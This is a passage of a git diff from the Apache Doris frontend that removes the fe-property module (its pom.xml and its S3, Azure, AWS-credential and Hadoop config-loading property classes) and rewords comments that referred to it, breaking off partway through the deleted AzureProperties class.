REST (server owns storage) and HDFS-only catalogs (carried by the raw passthrough instead). Map storageHadoopConfig = buildStorageHadoopConfig(); @@ -213,7 +213,7 @@ private Catalog createCatalog() { * fe-core binds the catalog's raw property map to fe-filesystem {@link StorageProperties} and hands * them over via {@link ConnectorContext#getStorageProperties()}; here we merge each one's * {@code toHadoopProperties().toHadoopConfigurationMap()} (fs.s3a.* / Jindo fs.oss.* / fs.cosn.* / - * fs.obs.* keys). This replaces the legacy fe-property + * fs.obs.* keys). This replaces the legacy * {@code StorageProperties.buildObjectStorageHadoopConfig(properties)} call that * {@link PaimonCatalogFactory#buildHadoopConfiguration}/{@code buildHmsHiveConf}/{@code buildDlfHiveConf} * used to make. Empty when no static object-store storage is configured — e.g. an HDFS-only catalog diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java index 6906c57c884f17..f056e608d087a2 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java @@ -253,7 +253,7 @@ public void buildHadoopConfigurationAppliesStorageHadoopConfig() { // WHY (P1-T03): the canonical object-store config (fs.s3a.* etc.) now arrives PRE-COMPUTED in // storageHadoopConfig — assembled by PaimonConnector from ConnectorContext.getStorageProperties() // via fe-filesystem's toHadoopConfigurationMap() — and the connector overlays it verbatim. Before - // P1-T03 the connector recomputed it from props via fe-property buildObjectStorageHadoopConfig. + // P1-T03 the connector recomputed it from props via the legacy buildObjectStorageHadoopConfig. // MUTATION: not applying storageHadoopConfig (fs.s3a.access.key null) -> red. Assertions.assertEquals("ak", conf.get("fs.s3a.access.key")); Assertions.assertEquals("s3.amazonaws.com", conf.get("fs.s3a.endpoint")); diff --git a/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsConfigFileLoader.java b/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsConfigFileLoader.java index b3fd8c79864106..fe788247ed2dca 100644 --- a/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsConfigFileLoader.java +++ b/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsConfigFileLoader.java @@ -28,9 +28,8 @@ /** * Loads Hadoop XML configuration files (e.g. {@code hdfs-site.xml} / {@code core-site.xml}) referenced by the * {@code hadoop.config.resources} property into a key-value map. This mirrors the legacy fe-core - * {@code CatalogConfigFileUtils.loadConfigurationFromHadoopConfDir} (and its fe-property port - * {@code PropertyConfigLoader}) but lives in fe-filesystem-hdfs so the module stays a leaf that does not - * depend on fe-core / fe-common. + * {@code CatalogConfigFileUtils.loadConfigurationFromHadoopConfDir} but lives in fe-filesystem-hdfs so the + * module stays a leaf that does not depend on fe-core / fe-common. * *

      The base directory under which the named resource files are resolved is computed by * {@link #resolveHadoopConfigDir()}: the operator-configured {@code Config.hadoop_config_dir}, bridged in via diff --git a/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProperties.java b/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProperties.java index 9daacdd9c49c21..a3ff3691162fcf 100644 --- a/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProperties.java +++ b/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProperties.java @@ -47,9 +47,8 @@ * Without it the typed path returns nothing for HDFS-warehouse catalogs (see DV-004 / R-007). * *

      The backend key set is a faithful port of the legacy fe-core - * {@code org.apache.doris.datasource.property.storage.HdfsProperties.getBackendConfigProperties()} (whose - * dependency-light twin is fe-property {@code HdfsProperties}) so the new typed path and the legacy path - * stay at parity. + * {@code org.apache.doris.datasource.property.storage.HdfsProperties.getBackendConfigProperties()} so the + * new typed path and the legacy path stay at parity. * *

      Scope note: this model deliberately does NOT implement {@code HadoopStorageProperties}. The * FE-side Hadoop {@link org.apache.hadoop.conf.Configuration} used to actually open an HDFS file system is diff --git a/fe/fe-property/pom.xml b/fe/fe-property/pom.xml deleted file mode 100644 index ab4d37ad8c6e26..00000000000000 --- a/fe/fe-property/pom.xml +++ /dev/null @@ -1,137 +0,0 @@ - - - - 4.0.0 - - org.apache.doris - ${revision} - fe - ../pom.xml - - fe-property - jar - Doris FE Property - Reusable data-source property parsing/validation/normalization for Doris FE modules and SPI connectors. - Parses raw user properties into typed, validated objects and normalized property maps; it does NOT construct - live storage/catalog objects (Configuration/Catalog/credential providers) — consumers build those from the - normalized maps using their own SDKs. Heavy dependencies are declared 'provided' so they are never shipped in - this module's jar. - - - - - ${project.groupId} - fe-foundation - - - - - org.apache.commons - commons-lang3 - - - org.apache.commons - commons-collections4 - - - com.google.guava - guava - - - org.apache.logging.log4j - log4j-api - - - org.projectlombok - lombok - provided - - - - - org.apache.hadoop - hadoop-common - provided - - - - org.junit.jupiter - junit-jupiter - test - - - - - doris-fe-property - ${project.basedir}/target/ - - - org.apache.maven.plugins - maven-jar-plugin - - - prepare-test-jar - test-compile - - test-jar - - - - - - org.apache.maven.plugins - maven-javadoc-plugin - - true - - - - - - - release - - - - org.apache.maven.plugins - maven-source-plugin - - true - - - - create-source-jar - - jar-no-fork - test-jar-no-fork - - - - - - - - - diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/ConnectionProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/ConnectionProperties.java deleted file mode 100644 index 6164e32ee8a182..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/ConnectionProperties.java +++ /dev/null @@ -1,139 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property; - -import org.apache.doris.foundation.property.ConnectorPropertiesUtils; -import org.apache.doris.foundation.property.ConnectorProperty; -import org.apache.doris.foundation.property.StoragePropertiesException; - -import com.google.common.base.Strings; -import com.google.common.collect.Maps; -import lombok.Getter; -import lombok.Setter; -import org.apache.hadoop.conf.Configuration; - -import java.lang.reflect.Field; -import java.util.HashMap; -import java.util.List; -import java.util.Map; -import java.util.Objects; - -public abstract class ConnectionProperties { - /** - * The original user-provided properties. - *

      - * This map may contain various configuration entries, not all of which are relevant - * to the specific Connector implementation. It serves as the raw input from the user. - */ - @Getter - @Setter - protected Map origProps; - - /** - * The filtered properties that are actually used by the Connector. - *

      - * This map only contains key-value pairs that are recognized and matched by - * the specific Connector implementation. It's a subset of {@code origProps}. - */ - @Getter - protected Map matchedProperties = new HashMap<>(); - - protected ConnectionProperties(Map origProps) { - this.origProps = origProps; - } - - public void initNormalizeAndCheckProps() { - ConnectorPropertiesUtils.bindConnectorProperties(this, origProps); - for (Field field : ConnectorPropertiesUtils.getConnectorProperties(this.getClass())) { - ConnectorProperty annotation = field.getAnnotation(ConnectorProperty.class); - for (String name : annotation.names()) { - if (origProps.containsKey(name)) { - matchedProperties.put(name, origProps.get(name)); - break; - } - } - } - // 3. check properties - checkRequiredProperties(); - } - - // Some properties may be loaded from file - // Subclass can override this method to load properties from file. - // The return value is the properties loaded from file, not include original properties - protected Map loadConfigFromFile(String resourceConfig) { - if (Strings.isNullOrEmpty(resourceConfig)) { - return new HashMap<>(); - } - Configuration conf = PropertyConfigLoader.loadConfigurationFromHadoopConfDir(resourceConfig); - Map confMap = Maps.newHashMap(); - for (Map.Entry entry : conf) { - confMap.put(entry.getKey(), entry.getValue()); - } - return confMap; - } - - // Subclass can override this method to return the property name of resource config. - protected String getResourceConfigPropName() { - return null; - } - - // This method will check if all required properties are set. - // Subclass can implement this method for additional check. - protected void checkRequiredProperties() { - List supportedProps = ConnectorPropertiesUtils.getConnectorProperties(this.getClass()); - for (Field field : supportedProps) { - field.setAccessible(true); - ConnectorProperty anno = field.getAnnotation(ConnectorProperty.class); - String[] names = anno.names(); - if (anno.required() && field.getType().equals(String.class)) { - try { - String value = (String) field.get(this); - if (Strings.isNullOrEmpty(value)) { - throw new IllegalArgumentException("Property " + names[0] + " is required."); - } - } catch (IllegalAccessException e) { - throw new StoragePropertiesException("Failed to get property " + names[0] - + ", " + e.getMessage(), e); - } - } - } - } - - /** - * Two ConnectionProperties are equal if they are of the same concrete type and - * have the same original properties. This ensures that logically identical - * configurations share the same cache key in {@code FileSystemCache}, preventing - * cache entry duplication and use-after-eviction race conditions. - */ - @Override - public boolean equals(Object obj) { - if (this == obj) { - return true; - } - if (obj == null || getClass() != obj.getClass()) { - return false; - } - ConnectionProperties other = (ConnectionProperties) obj; - return Objects.equals(origProps, other.origProps); - } - - @Override - public int hashCode() { - return Objects.hash(getClass().getName(), origProps); - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/PropertyConfigLoader.java b/fe/fe-property/src/main/java/org/apache/doris/property/PropertyConfigLoader.java deleted file mode 100644 index 7d5dc072c3bd96..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/PropertyConfigLoader.java +++ /dev/null @@ -1,81 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property; - -import org.apache.commons.lang3.StringUtils; -import org.apache.hadoop.conf.Configuration; -import org.apache.hadoop.fs.Path; - -import java.io.File; - -/** - * Loads Hadoop XML configuration files (e.g. {@code hdfs-site.xml} / {@code core-site.xml}) referenced by - * {@code hadoop.config.resources} into a Hadoop {@link Configuration}. This mirrors the legacy fe-core - * {@code CatalogConfigFileUtils.loadConfigurationFromHadoopConfDir} but lives in fe-property so the module does - * not depend on fe-core/fe-common. - * - *

      The base directory under which the named resource files are resolved is {@link #hadoopConfigDir}. It defaults - * to {@code $DORIS_HOME/plugins/hadoop_conf/} (matching legacy {@code Config.hadoop_config_dir}); the engine may - * override it at startup. hadoop-common is a {@code provided} dependency of fe-property — present at compile time - * and supplied at runtime by every consumer (fe-core, SPI connector plugins) — and is never packaged in this jar. - */ -public final class PropertyConfigLoader { - - /** - * Base directory under which {@code hadoop.config.resources} file names are resolved. Defaults to - * {@code $DORIS_HOME/plugins/hadoop_conf/}; the engine may overwrite it at startup to match its own - * {@code Config.hadoop_config_dir}. - */ - public static volatile String hadoopConfigDir = defaultHadoopConfigDir(); - - private PropertyConfigLoader() { - } - - private static String defaultHadoopConfigDir() { - String home = System.getenv("DORIS_HOME"); - if (StringUtils.isBlank(home)) { - home = System.getProperty("doris.home", ""); - } - return home + "/plugins/hadoop_conf/"; - } - - /** - * Loads a Hadoop {@link Configuration} from the comma-separated list of file names, each resolved under - * {@link #hadoopConfigDir}. - * - * @param resourcesPath comma-separated list of config file names - * @return a Hadoop Configuration with the named files added as resources - * @throws IllegalArgumentException if the input is blank or a referenced file is missing - */ - public static Configuration loadConfigurationFromHadoopConfDir(String resourcesPath) { - if (StringUtils.isBlank(resourcesPath)) { - throw new IllegalArgumentException("Config resource path is empty"); - } - Configuration conf = new Configuration(); - for (String resource : resourcesPath.split(",")) { - String resourcePath = hadoopConfigDir + resource.trim(); - File file = new File(resourcePath); - if (file.exists() && file.isFile()) { - conf.addResource(new Path(file.toURI())); - } else { - throw new IllegalArgumentException("Config resource file does not exist: " + resourcePath); - } - } - return conf; - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/common/AwsCredentialsProviderMode.java b/fe/fe-property/src/main/java/org/apache/doris/property/common/AwsCredentialsProviderMode.java deleted file mode 100644 index da698f8c656e58..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/common/AwsCredentialsProviderMode.java +++ /dev/null @@ -1,74 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.common; - -public enum AwsCredentialsProviderMode { - - DEFAULT("DEFAULT"), - - ENV("ENV"), - - SYSTEM_PROPERTIES("SYSTEM_PROPERTIES"), - - WEB_IDENTITY("WEB_IDENTITY"), - - CONTAINER("CONTAINER"), - - INSTANCE_PROFILE("INSTANCE_PROFILE"), - - ANONYMOUS("ANONYMOUS"); - - private final String mode; - - AwsCredentialsProviderMode(String mode) { - this.mode = mode; - } - - public String getMode() { - return mode; - } - - - public static AwsCredentialsProviderMode fromString(String value) { - if (value == null || value.isEmpty()) { - return DEFAULT; - } - - String normalized = value.trim().toUpperCase().replace('-', '_'); - - switch (normalized) { - case "ENV": - return ENV; - case "SYSTEM_PROPERTIES": - return SYSTEM_PROPERTIES; - case "WEB_IDENTITY": - return WEB_IDENTITY; - case "CONTAINER": - return CONTAINER; - case "INSTANCE_PROFILE": - return INSTANCE_PROFILE; - case "ANONYMOUS": - return ANONYMOUS; - case "DEFAULT": - return DEFAULT; - default: - throw new IllegalArgumentException( - "Unsupported AWS credentials provider mode: " + value); - } - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/AbstractS3CompatibleProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/AbstractS3CompatibleProperties.java deleted file mode 100644 index 840fbd30605f62..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/AbstractS3CompatibleProperties.java +++ /dev/null @@ -1,318 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.ConnectorPropertiesUtils; -import org.apache.doris.foundation.property.ConnectorProperty; -import org.apache.doris.foundation.property.StoragePropertiesException; -import org.apache.doris.property.common.AwsCredentialsProviderMode; - -import org.apache.commons.lang3.StringUtils; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -import java.lang.reflect.Field; -import java.util.Arrays; -import java.util.HashMap; -import java.util.LinkedHashMap; -import java.util.List; -import java.util.Map; -import java.util.Optional; -import java.util.Set; -import java.util.regex.Matcher; -import java.util.regex.Pattern; - -/** - * Abstract base class for object storage system properties. This class provides common configuration - * settings for object storage systems and supports conversion of these properties into configuration - * maps for different protocols, such as AWS S3. All object storage systems should extend this class - * to inherit the common configuration properties and methods. - *

      - * The properties include connection settings (e.g., timeouts and maximum connections) and a flag to - * determine if path-style URLs should be used for the storage system. - */ -public abstract class AbstractS3CompatibleProperties extends StorageProperties implements ObjectStorageProperties { - private static final Logger LOG = LogManager.getLogger(AbstractS3CompatibleProperties.class); - - /** - * Constructor to initialize the object storage properties with the provided type and original properties map. - * - * @param type the type of object storage system. - * @param origProps the original properties map. - */ - protected AbstractS3CompatibleProperties(Type type, Map origProps) { - super(type, origProps); - } - - /** - * Generates a map of AWS S3 configuration properties specifically for Backend (BE) service usage. - * This configuration includes endpoint, region, access credentials, timeouts, and connection settings. - * The map is typically used to initialize S3-compatible storage access for the backend. - * - * @param maxConnections the maximum number of allowed S3 connections. - * @param requestTimeoutMs request timeout in milliseconds. - * @param connectionTimeoutMs connection timeout in milliseconds. - * @param usePathStyle whether to use path-style access (true/false). - * @return a map containing AWS S3 configuration properties. - */ - protected Map generateBackendS3Configuration(String maxConnections, - String requestTimeoutMs, - String connectionTimeoutMs, - String usePathStyle) { - return doBuildS3Configuration(maxConnections, requestTimeoutMs, connectionTimeoutMs, usePathStyle); - } - - /** - * Overloaded version of {@link #generateBackendS3Configuration(String, String, String, String)} - * that uses default values - * from the current object context for connection settings. - * - * @return a map containing AWS S3 configuration properties. - */ - protected Map generateBackendS3Configuration() { - return doBuildS3Configuration(getMaxConnections(), getRequestTimeoutS(), getConnectionTimeoutS(), - getUsePathStyle()); - } - - /** - * Internal method to centralize S3 configuration property assembly. - */ - private Map doBuildS3Configuration(String maxConnections, - String requestTimeoutMs, - String connectionTimeoutMs, - String usePathStyle) { - Map s3Props = new HashMap<>(); - s3Props.put("AWS_ENDPOINT", getEndpoint()); - s3Props.put("AWS_REGION", getRegion()); - s3Props.put("AWS_ACCESS_KEY", getAccessKey()); - s3Props.put("AWS_SECRET_KEY", getSecretKey()); - s3Props.put("AWS_MAX_CONNECTIONS", maxConnections); - s3Props.put("AWS_REQUEST_TIMEOUT_MS", requestTimeoutMs); - s3Props.put("AWS_CONNECTION_TIMEOUT_MS", connectionTimeoutMs); - s3Props.put("use_path_style", usePathStyle); - if (StringUtils.isNotBlank(getSessionToken())) { - s3Props.put("AWS_TOKEN", getSessionToken()); - } - String credentialsProviderType = getAwsCredentialsProviderTypeForBackend(); - if (StringUtils.isNotBlank(credentialsProviderType)) { - s3Props.put("AWS_CREDENTIALS_PROVIDER_TYPE", credentialsProviderType); - } - return s3Props; - } - - protected String getAwsCredentialsProviderTypeForBackend() { - if (StringUtils.isBlank(getAccessKey()) && StringUtils.isBlank(getSecretKey())) { - return AwsCredentialsProviderMode.ANONYMOUS.name(); - } - return null; - } - - @Override - public Map getBackendConfigProperties() { - return generateBackendS3Configuration(); - } - - @Override - public void initNormalizeAndCheckProps() { - super.initNormalizeAndCheckProps(); - setEndpointIfPossible(); - setRegionIfPossible(); - // NOTE (fe-property leniency — matches the connector storage-config port): region/endpoint are NOT - // required here. setEndpointIfPossible/setRegionIfPossible derive them when possible; if still blank, the - // corresponding fs.s3a.endpoint[.region] key is simply omitted (see appendS3HdfsProperties) instead of - // failing fast. Legacy fe-core threw; the connector emits conditionally, and that behavior is preserved so - // a connector catalog that delegates parsing here keeps its current (lenient) runtime behavior. - } - - /** - * Checks and validates the configured endpoint. - *

      - * All object storage implementations must have an explicitly set endpoint. - * However, for compatibility with legacy behavior—especially when using DLF - * as the catalog—some logic may derive the endpoint based on the region. - *

      - * To support such cases, this method is exposed as {@code protected} to allow - * subclasses to override it with custom logic if necessary. - *

      - * That said, we strongly recommend users to explicitly configure both - * {@code endpoint} and {@code region} to ensure predictable behavior - * across all storage backends. - * - * @throws IllegalArgumentException if the endpoint format is invalid - */ - protected void setEndpointIfPossible() { - if (StringUtils.isNotBlank(getEndpoint())) { - return; - } - // 1. try getting endpoint region - String endpoint = getEndpointFromRegion(); - if (StringUtils.isNotBlank(endpoint)) { - setEndpoint(endpoint); - return; - } - // 2. try getting endpoint from uri - try { - endpoint = S3PropertyUtils.constructEndpointFromUrl(origProps, getUsePathStyle(), - getForceParsingByStandardUrl()); - if (StringUtils.isNotBlank(endpoint)) { - setEndpoint(endpoint); - } - } catch (Exception e) { - if (LOG.isDebugEnabled()) { - LOG.debug("Failed to construct endpoint from url: {}", e.getMessage(), e); - } - } - } - - private void setRegionIfPossible() { - if (StringUtils.isNotBlank(getRegion())) { - return; - } - String endpoint = getEndpoint(); - if (endpoint == null || endpoint.isEmpty()) { - return; - } - Optional regionOptional = extractRegion(endpoint); - if (regionOptional.isPresent()) { - setRegion(regionOptional.get()); - } - } - - private Optional extractRegion(String endpoint) { - return extractRegion(endpointPatterns(), endpoint); - } - - public static Optional extractRegion(Set endpointPatterns, String endpoint) { - for (Pattern pattern : endpointPatterns) { - Matcher matcher = pattern.matcher(endpoint.toLowerCase()); - if (matcher.matches()) { - // Check all possible groups for region (group 1, 2, or 3) - for (int i = 1; i <= matcher.groupCount(); i++) { - String group = matcher.group(i); - if (StringUtils.isNotBlank(group)) { - return Optional.of(group); - } - } - } - } - return Optional.empty(); - } - - protected abstract Set endpointPatterns(); - - // This method should be overridden by subclasses to provide a default endpoint based on the region. - // Because for aws s3, only region is needed, the endpoint can be constructed from the region. - // But for other s3 compatible storage, the endpoint may need to be specified explicitly. - protected String getEndpointFromRegion() { - return ""; - } - - @Override - public String validateAndNormalizeUri(String uri) throws StoragePropertiesException { - return S3PropertyUtils.validateAndNormalizeUri(uri, getUsePathStyle(), getForceParsingByStandardUrl()); - - } - - @Override - public String validateAndGetUri(Map loadProps) throws StoragePropertiesException { - return S3PropertyUtils.validateAndGetUri(loadProps); - } - - @Override - public void initializeHadoopStorageConfig() { - hadoopConfigMap = new LinkedHashMap<>(); - // Compatibility note: Due to historical reasons, even when the underlying - // storage is OSS, OBS, etc., users may still configure the schema as "s3://". - // To ensure backward compatibility, we append S3-related properties by default. - appendS3HdfsProperties(hadoopConfigMap); - } - - private void appendS3HdfsProperties(Map hadoopConfigMap) { - hadoopConfigMap.put("fs.s3.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem"); - hadoopConfigMap.put("fs.s3a.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem"); - // endpoint/region emitted only when present (lenient; matches the connector port that omitted them when - // blank rather than asserting non-null). - if (StringUtils.isNotBlank(getEndpoint())) { - hadoopConfigMap.put("fs.s3a.endpoint", getEndpoint()); - } - if (StringUtils.isNotBlank(getRegion())) { - hadoopConfigMap.put("fs.s3a.endpoint.region", getRegion()); - } - hadoopConfigMap.put("fs.s3.impl.disable.cache", "true"); - hadoopConfigMap.put("fs.s3a.impl.disable.cache", "true"); - if (StringUtils.isNotBlank(getAccessKey())) { - hadoopConfigMap.put("fs.s3a.aws.credentials.provider", - "org.apache.hadoop.fs.s3a.SimpleAWSCredentialsProvider"); - hadoopConfigMap.put("fs.s3a.access.key", getAccessKey()); - hadoopConfigMap.put("fs.s3a.secret.key", getSecretKey()); - if (StringUtils.isNotBlank(getSessionToken())) { - hadoopConfigMap.put("fs.s3a.session.token", getSessionToken()); - } - } - hadoopConfigMap.put("fs.s3a.connection.maximum", getMaxConnections()); - hadoopConfigMap.put("fs.s3a.connection.request.timeout", getRequestTimeoutS()); - hadoopConfigMap.put("fs.s3a.connection.timeout", getConnectionTimeoutS()); - hadoopConfigMap.put("fs.s3a.path.style.access", getUsePathStyle()); - } - - /** - * Searches for a region value from the given properties map by scanning all known - * S3-compatible subclass region field annotations. - *

      - * This method iterates through all known subclasses of {@link AbstractS3CompatibleProperties}, - * finds fields annotated with {@code @ConnectorProperty(isRegionField = true)}, - * and checks if any of the annotation's {@code names} exist in the provided properties map. - * - * @param props the property map to search for region values - * @return the region value if found, or {@code null} if no region property is present - */ - public static String getRegionFromProperties(Map props) { - List> subClasses = Arrays.asList( - S3Properties.class, OSSProperties.class, COSProperties.class, - OBSProperties.class, MinioProperties.class); - for (Class clazz : subClasses) { - List fields = ConnectorPropertiesUtils.getConnectorProperties(clazz); - for (Field field : fields) { - ConnectorProperty annotation = field.getAnnotation(ConnectorProperty.class); - if (annotation != null && annotation.isRegionField()) { - for (String name : annotation.names()) { - String value = props.get(name); - if (StringUtils.isNotBlank(value)) { - return value; - } - } - } - } - } - return null; - } - - @Override - public String getStorageName() { - return "S3"; - } - - /** Returns the bucket name from the connector properties map. */ - public String getBucket() { - String bucket = origProps.get("s3.bucket"); - if (bucket == null) { - bucket = origProps.get("AWS_BUCKET"); - } - return bucket != null ? bucket : ""; - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/AzureProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/AzureProperties.java deleted file mode 100644 index b1128a78e641ba..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/AzureProperties.java +++ /dev/null @@ -1,334 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.ConnectorPropertiesUtils; -import org.apache.doris.foundation.property.ConnectorProperty; -import org.apache.doris.foundation.property.ParamRules; -import org.apache.doris.foundation.property.StoragePropertiesException; -import org.apache.doris.property.storage.exception.AzureAuthType; - -import com.google.common.base.Strings; -import com.google.common.collect.ImmutableSet; -import lombok.Getter; -import lombok.Setter; - -import java.util.HashMap; -import java.util.LinkedHashMap; -import java.util.LinkedHashSet; -import java.util.Locale; -import java.util.Map; -import java.util.Objects; -import java.util.Set; -import java.util.stream.Stream; - -/** - * AzureProperties is a specialized configuration class for accessing Azure Blob Storage - * using an S3-compatible interface. - * - *

      This class extends {@link StorageProperties} and adapts Azure-specific properties - * to a format that is compatible with the backend engine (BE), which expects configurations - * similar to Amazon S3. This is necessary because the backend is designed to work with - * S3-style parameters regardless of the actual cloud provider. - * - *

      Although Azure Blob Storage does not use all of the S3 parameters (e.g., region), - * this class maps and provides dummy or compatible values to satisfy the expected format. - * It also tags the provider as "azure" in the final configuration map. - * - *

      The class supports common parameters like access key, secret key, endpoint, and - * path style access, while also ensuring compatibility with existing S3 processing - * logic by delegating some functionality to {@code S3PropertyUtils}. - * - *

      Typical usage includes validation of required parameters, transformation to a - * backend-compatible configuration map, and conversion of URLs to storage paths. - * - *

      Note: This class may evolve as the backend introduces native Azure support - * or adopts a more flexible configuration model. - * - * @see StorageProperties - * @see S3PropertyUtils - */ -public class AzureProperties extends StorageProperties { - @Getter - @ConnectorProperty(names = {"azure.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}, - required = false, - description = "The endpoint of S3.") - protected String endpoint = ""; - - - @Getter - @ConnectorProperty(names = {"azure.account_name", "azure.access_key", "s3.access_key", - "AWS_ACCESS_KEY", "ACCESS_KEY", "access_key"}, - required = false, - sensitive = true, - description = "The access key of S3.") - protected String accountName = ""; - - @Getter - @ConnectorProperty(names = {"azure.account_key", "azure.secret_key", "s3.secret_key", - "AWS_SECRET_KEY", "secret_key"}, - sensitive = true, - required = false, - description = "The secret key of S3.") - protected String accountKey = ""; - - @ConnectorProperty(names = {"azure.oauth2_client_id"}, - required = false, - description = "The client id of Azure AD application.") - private String clientId; - - @ConnectorProperty(names = {"azure.oauth2_client_secret"}, - required = false, - sensitive = true, - description = "The client secret of Azure AD application.") - private String clientSecret; - - - @ConnectorProperty(names = {"azure.oauth2_server_uri"}, - required = false, - description = "The account host of Azure blob.") - private String oauthServerUri; - - @ConnectorProperty(names = {"azure.oauth2_account_host"}, - required = false, - description = "The account host of Azure blob.") - private String accountHost; - - @ConnectorProperty(names = {"azure.auth_type"}, - required = false, - description = "The auth type of Azure blob.") - private String azureAuthType = AzureAuthType.SharedKey.name(); - - @Getter - @ConnectorProperty(names = {"container", "azure.bucket", "s3.bucket"}, - required = false, - description = "The container of Azure blob.") - protected String container = ""; - - /** - * Flag indicating whether to use path-style URLs for the object storage system. - * This value is optional and can be configured by the user. - */ - @Setter - @Getter - @ConnectorProperty(names = {"use_path_style", "s3.path-style-access"}, required = false, - description = "Whether to use path style URL for the storage.") - protected String usePathStyle = "false"; - @ConnectorProperty(names = {"force_parsing_by_standard_uri"}, required = false, - description = "Whether to use path style URL for the storage.") - @Getter - protected String forceParsingByStandardUrl = "false"; - - public AzureProperties(Map origProps) { - super(Type.AZURE, origProps); - } - - public static AzureProperties of(Map properties) { - AzureProperties propertiesObj = new AzureProperties(properties); - ConnectorPropertiesUtils.bindConnectorProperties(propertiesObj, properties); - propertiesObj.initNormalizeAndCheckProps(); - return propertiesObj; - } - - @Override - public void initNormalizeAndCheckProps() { - super.initNormalizeAndCheckProps(); - //check endpoint - this.endpoint = formatAzureEndpoint(endpoint, accountName); - buildRules().validate(); - if (AzureAuthType.OAuth2.name().equals(azureAuthType) && (!isIcebergRestCatalog())) { - throw new UnsupportedOperationException("OAuth2 auth type is only supported for iceberg rest catalog"); - } - } - - public static boolean guessIsMe(Map origProps) { - boolean enable = origProps.containsKey(FS_PROVIDER_KEY) - && origProps.get(FS_PROVIDER_KEY).equalsIgnoreCase("azure"); - 